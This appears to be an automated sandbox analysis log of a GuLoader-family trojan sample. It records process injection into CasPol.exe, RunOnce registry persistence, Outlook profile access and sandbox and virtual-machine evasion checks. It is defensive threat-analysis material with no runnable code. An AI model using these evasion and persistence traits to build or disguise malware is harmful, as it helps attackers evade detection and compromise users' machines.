            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03398EC21_2_03398EC2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010011305_2_01001130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010043205_2_01004320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01003A505_2_01003A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100CCB05_2_0100CCB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100BF505_2_0100BF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010037085_2_01003708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010818C05_2_010818C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_010880685_2_01088068
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01082B185_2_01082B18
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0142AC505_2_0142AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014260985_2_01426098
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014252B05_2_014252B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01421D285_2_01421D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014244F85_2_014244F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_014232A85_2_014232A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156ED705_2_0156ED70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156E90B5_2_0156E90B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01561B905_2_01561B90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156B6ED5_2_0156B6ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01562AE85_2_01562AE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_015671205_2_01567120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_015600405_2_01560040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0156A3C85_2_0156A3C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C778C475_2_1C778C47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C7725705_2_1C772570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C7751085_2_1C775108
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1C77B4385_2_1C77B438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5E085_2_1D5B5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B6AD05_2_1D5B6AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B46C45_2_1D5B46C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5D205_2_1D5B5D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B5D805_2_1D5B5D80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_1D5B6AF15_2_1D5B6AF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 01006288 appears 52 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339FC0D NtProtectVirtualMemory,1_2_0339FC0D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033A00DF NtResumeThread,1_2_033A00DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0110C3C8 NtAllocateVirtualMemory,5_2_0110C3C8
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThrottlePlugin.dllL vs SecuriteInfo.com.Trojan.Inject.11626.exe
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeVirustotal: Detection: 11%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeJump to behavior
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe" Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\nsl3FE3.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/13@1/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile written: C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SecuriteInfo.com.Trojan.Inject.11626.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\ThrottlePlugin.pdb00 source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14983490705.0000000002987000.00000004.00000800.00020000.00000000.sdmp, ThrottlePlugin.dll.1.dr

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.14985940057.0000000003391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.14824947099.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E230C0 push eax; ret 1_2_70E230EE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_033939B0 pushad ; ret 1_2_033939B1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03394D82 push ds; ret 1_2_0339C6DE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_03393DF7 push ebp; retf 1_2_03393DF8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_70E21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_70E21BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile created: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982548918.00000000007A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXENZP
            Source: SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14986099860.0000000003481000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject.11626.exe, 00000001.00000002.14982251535.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7400Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0339213A rdtsc 1_2_0339213A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_01425260 smsw word ptr [eax]5_2_01425260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9933Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 5_2_0100F388 sgdt fword ptr [eax]5_2_0100F388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
